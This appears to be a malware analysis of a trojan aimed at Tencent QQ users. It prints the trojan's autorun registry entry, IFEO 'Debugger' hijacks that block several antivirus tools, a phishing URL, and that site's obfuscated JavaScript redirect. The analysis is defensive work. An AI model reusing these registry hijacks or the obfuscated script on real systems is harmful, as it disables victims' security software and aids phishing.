Upon execution, it creates the following registry entry so that it starts automatically whenever the system reboots:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\run]
"qq.exe"="{Path of the malware}"
It also creates the following registry entries to hijack these security-related programs. Each Image File Execution Options (IFEO) "Debugger" value tells Windows to launch the listed "debugger" instead of the named program, so svchost.exe is started in place of the security tool and the tool itself never runs:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe]
"Debugger"="C:\\WINDOWS\\system32\\svchost.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe]
"Debugger"="C:\\WINDOWS\\system32\\svchost.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe]
"Debugger"="C:\\WINDOWS\\system32\\svchost.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DrRtp.exe]
"Debugger"="C:\\WINDOWS\\system32\\svchost.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQDoctor.exe]
"Debugger"="C:\\WINDOWS\\system32\\svchost.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RStray.exe]
"Debugger"="C:\\WINDOWS\\system32\\svchost.exe"
To clean trojans related to Tencent QQ, QQ embeds a dialog box named "QQ Doctor" in the QQ login dialog box. Once the trojan is running, it hides this dialog box, so the end user cannot clean the trojans.
When the trojan finds that an end user has logged in to QQ, it displays a fake Tencent Company notification dialog box, like the following:

When the user clicks this dialog box, it takes the user to the following phishing website:
http://www.08-qqq.cn
This website records the visitor's IP address, and each IP address can access the website only once within a certain period. When an end user accesses the website, it responds with an HTML page like the following (the page differs on every visit):
<html><body><script>function decoder(){var xlbb=new Array(88,181,199,210,70,205,152,26,75,42,193,125,150,68,28,243,245,161,149,
183,7,126,220,94,226,10,235,247,50,154,8,26,94,219);var syb=4;do{if(syb>32)break;xlbb[syb]=(((~((xlbb[syb]-xlbb[syb+1])&0xff))&0xff)+181)&0xff;syb++;}while(true);var syb=4;while(true){if(syb>30)break;xlbb[syb]=((((xlbb[syb]-xlbb[syb+1])&0xff)>>2)|((((xlbb[syb]-xlbb[syb+1])&0xff)<<6)&0xff))^xlbb[2];syb++;}for(var syb=2;;syb++){if(syb>29)break;xlbb[syb]=(-(((xlbb[syb]<<3)&0xff)|(xlbb[syb]>>5)))&0xff;}return String.fromCharCode(xlbb[3],xlbb[6],xlbb[7],xlbb[9],xlbb[14],xlbb[18],xlbb[21],xlbb[22],xlbb[25],xlbb[27],xlbb[28],xlbb[29],xlbb[30],xlbb[32]);}window.location="/?"+decoder();</script><br><br><center><h3>ʱҳҪ֧JavaScript</h3></center></body></html>
This web page contains obfuscated JavaScript. In fact, the script only generates a string like the following:
"jdfwkey=lcx3v2"
and then navigates to the following web page:
http://www.08-qqq.cn/?jdfwkey=lcx3v2
These web pages cannot be accessed at this time.